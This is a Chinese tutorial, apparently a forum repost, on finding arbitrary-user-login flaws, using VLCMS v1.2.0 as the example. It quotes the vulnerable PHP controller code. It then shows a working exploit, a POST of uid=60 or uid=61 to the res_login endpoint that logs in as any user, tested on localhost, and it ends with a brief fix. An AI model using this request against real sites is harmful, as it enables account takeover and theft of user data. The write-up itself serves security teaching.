WEB安全系列之如何挖掘任意用户登录漏洞

WEB安全系列之如何挖掘任意用户登录漏洞

0x01  前言   
     每周两篇文章打卡。坏蛋100块钱都不给我，好坏好坏的。


0x02  什么是任意用户登录漏洞
   几乎每个网站都有自己的会员系统，有会员，就有登录机制，如果可以登录其他用户账户，那么就可以窃取其他用户的资料数据。如果配合上脚本的话，甚至可以批量获取用户的数据。对网站来说，任意用户登录是一个很高危的漏洞。


0x03  实战的案例（白盒测试）
     Vlcmsv1.2.0，就拿这套CMS来说吧。
     vlcms/Application/Media/Controller/MemberController.class.php
     post获取uid传进autoLogin()中

1. public function res_login(){
2.                 parent::autoLogin($_POST['uid']);
3.                 echo $this->ajaxReturn(array("status"=>0,"uid"=>$_POST['uid']));
4.         }

复制代码

     将id传进entity()。

1. protected function autoLogin($uid){
2.                 $user =$this->entity($uid);
3.         /* 记录登录SESSION和COOKIES */
4.         $auth = array(
5.             'mid'             => $user['id'],
6.             'account'             => $user['account'],
7.             'nickname'        => $user['nickname'],
8.             'balance'         => $user['balance'],
9.             'last_login_time' => $user['login_time'],
10.         );
11.         session('member_auth', $auth);
12.         session('member_auth_sign', data_auth_sign($auth));
13.         }

复制代码

entity中直接根据id查询账户了。。所以只需一个id就能登录任意用户。

1. protected function entity($id){
2.                 $data = M('User','tab_')->find($id);
3.                 if(empty($data)){
4.                         return false;
5.                 }
6.                 return $data;
7.         }

复制代码

0x04  实战的案例（黑盒测试）
     http://127.0.0.1/vlcms/index.php?s=/member/res_login/
     POST:uid=60


     访问后，返回一串代码。
      <ignore_js_op> 

     接着访问http://127.0.0.1/vlcms/index.php?s=/member/，可以看到，已经成功登录账户


      <ignore_js_op> 
     访问：post：uid=61
      <ignore_js_op> 
     接着访问http://127.0.0.1/vlcms/index.php?s=/member/


     成功登录uid为61的账户


      <ignore_js_op> 

0x05  修复建议
     不要用id来判断账户身份。

本文来源：http://bbs.ichunqiu.com/thread-8655-1-1.html?from=bokeyuan